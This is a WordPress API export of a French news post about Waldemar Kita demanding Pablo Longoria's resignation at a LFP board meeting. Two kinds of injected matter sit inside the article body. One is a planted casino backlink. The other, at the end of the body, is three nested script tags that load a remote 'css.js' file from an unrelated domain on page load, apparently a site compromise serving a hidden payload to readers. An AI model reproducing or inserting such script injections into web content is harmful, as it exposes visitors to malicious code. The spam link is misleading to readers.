{"id":3847,"date":"2025-11-20T03:40:59","date_gmt":"2025-11-20T03:40:59","guid":{"rendered":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/?p=3847"},"modified":"2026-02-02T22:13:29","modified_gmt":"2026-02-02T22:13:29","slug":"om-kita-a-demande-la-demission-de-pablo-longoria-a-la-lfp","status":"publish","type":"post","link":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/2025\/11\/20\/om-kita-a-demande-la-demission-de-pablo-longoria-a-la-lfp\/","title":{"rendered":"OM &#8211; Kita a demand\u00e9 la d\u00e9mission de Pablo Longoria \u00e0 la LFP !"},"content":{"rendered":"<h1>OM &#8211; Kita a demand\u00e9 la d\u00e9mission de Pablo Longoria \u00e0 la LFP !<\/h1>\n<h2>Un conseil d\u2019administration sous haute tension<\/h2>\n<p>R\u00e9uni ce lundi soir \u00e0 Paris, le conseil d\u2019administration de la Ligue de football professionnel devait notamment faire le point sur le projet <em>Ligue 1+<\/em>. Si la satisfaction existait autour du cap symbolique du million d\u2019abonn\u00e9s franchi par le diffuseur principal, l\u2019ambiance a rapidement tourn\u00e9 \u00e0 la confrontation lorsque les d\u00e9bats ont d\u00e9riv\u00e9 sur les questions de gouvernance. L\u2019absence remarqu\u00e9e de <strong>Philippe Diallo<\/strong>, pr\u00e9sident de la FFF, a \u00e9galement aliment\u00e9 les discussions.<\/p>\n<blockquote><p><strong><a href=\"https:\/\/casino-deauville-fr.com\/casino-deauville-retraits\/\" target=\"_blank\" rel=\"dofollow\">casino deauville Retraits<\/a><\/strong> &#8211; Le montant minimum pour un retrait est g\u00e9n\u00e9ralement de 20\u20ac, mais cela peut varier en fonction de la m\u00e9thode choisie.<\/p><\/blockquote>\n<h2>Waldemar Kita s\u2019en prend \u00e0 Pablo Longoria<\/h2>\n<p>Selon <em>RMC Sport<\/em>, au c\u0153ur des \u00e9changes, <strong>Waldemar Kita<\/strong> n\u2019a pas m\u00e2ch\u00e9 ses mots \u00e0 l\u2019\u00e9gard de <strong>Pablo Longoria<\/strong>. Le pr\u00e9sident du FC Nantes a demand\u00e9 la d\u00e9mission de son homologue marseillais, lui reprochant des propos tenus en f\u00e9vrier dernier \u00e0 Auxerre, o\u00f9 ce dernier avait \u00e9voqu\u00e9 <em>&quot;la corruption&quot;<\/em> et un <em>&quot;championnat de merde&quot;<\/em>. <em>&quot;Tu n\u2019as pas honte, qui es-tu pour dire \u00e7a ?&quot;<\/em>, aurait lanc\u00e9 <strong>Kita<\/strong> devant l\u2019ensemble des membres pr\u00e9sents. Des mots qualifi\u00e9s de <em>&quot;tr\u00e8s offensifs&quot;<\/em> par certains participants.<\/p>\n<h2>L\u2019ombre de McCourt et la fracture autour de Labrune<\/h2>\n<p>La charge de <strong>Kita<\/strong> s\u2019inscrit dans un contexte tendu, <strong>marqu\u00e9 par la r\u00e9cente intervention de Frank McCourt<\/strong>. Le propri\u00e9taire am\u00e9ricain de l\u2019OM a publiquement souhait\u00e9 un changement de gouvernance et la fin du mandat de <strong>Vincent Labrune<\/strong>, pr\u00e9sident de la LFP. Aux c\u00f4t\u00e9s de <strong>Joseph Oughourlian<\/strong>, patron du RC Lens, <strong>McCourt<\/strong> s\u2019est positionn\u00e9 comme figure de l\u2019opposition, mettant sous pression l\u2019\u00e9quilibre politique de l\u2019instance. Un positionnement qui crispe une majorit\u00e9 de pr\u00e9sidents rest\u00e9s solidaires de Labrune.<\/p>\n<h2>Longoria isol\u00e9 mais silencieux<\/h2>\n<p>Vice-pr\u00e9sident de la Ligue, <strong>Longoria<\/strong> n\u2019est pas revenu sur ses propos pol\u00e9miques de janvier. Certains t\u00e9moins de la r\u00e9union ont d\u00e9crit l\u2019\u00e9pisode comme <em>&quot;chirurgical&quot;<\/em>, soulignant le caract\u00e8re direct et appuy\u00e9 des critiques formul\u00e9es par <strong>Kita<\/strong>. Ce dernier a m\u00eame ajout\u00e9 : <em>&quot;Quand on crache sur le pays, ce n\u2019est pas possible et c\u2019est un Polonais qui te parle&quot;<\/em>. Une sortie qui en dit long sur la fracture actuelle entre dirigeants, et qui illustre combien la gouvernance du football fran\u00e7ais reste sous tension \u00e0 l\u2019aube d\u2019une saison charni\u00e8re pour la Ligue 1.<\/p>\n<p><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>OM &#8211; Kita a demand\u00e9 la d\u00e9mission de Pablo Longoria \u00e0 la LFP ! Un conseil d\u2019administration sous haute tension R\u00e9uni ce lundi soir \u00e0 Paris, le conseil d\u2019administration de&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[19],"tags":[],"class_list":{"0":"post-3847","1":"post","2":"type-post","3":"status-publish","4":"format-standard","6":"category-cassino"},"_links":{"self":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3847","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/comments?post=3847"}],"version-history":[{"count":4,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3847\/revisions"}],"predecessor-version":[{"id":14952,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/posts\/3847\/revisions\/14952"}],"wp:attachment":[{"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/media?parent=3847"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/categories?post=3847"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/devu02.testdevlink.net\/Urban_Customs\/wp-json\/wp\/v2\/tags?post=3847"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}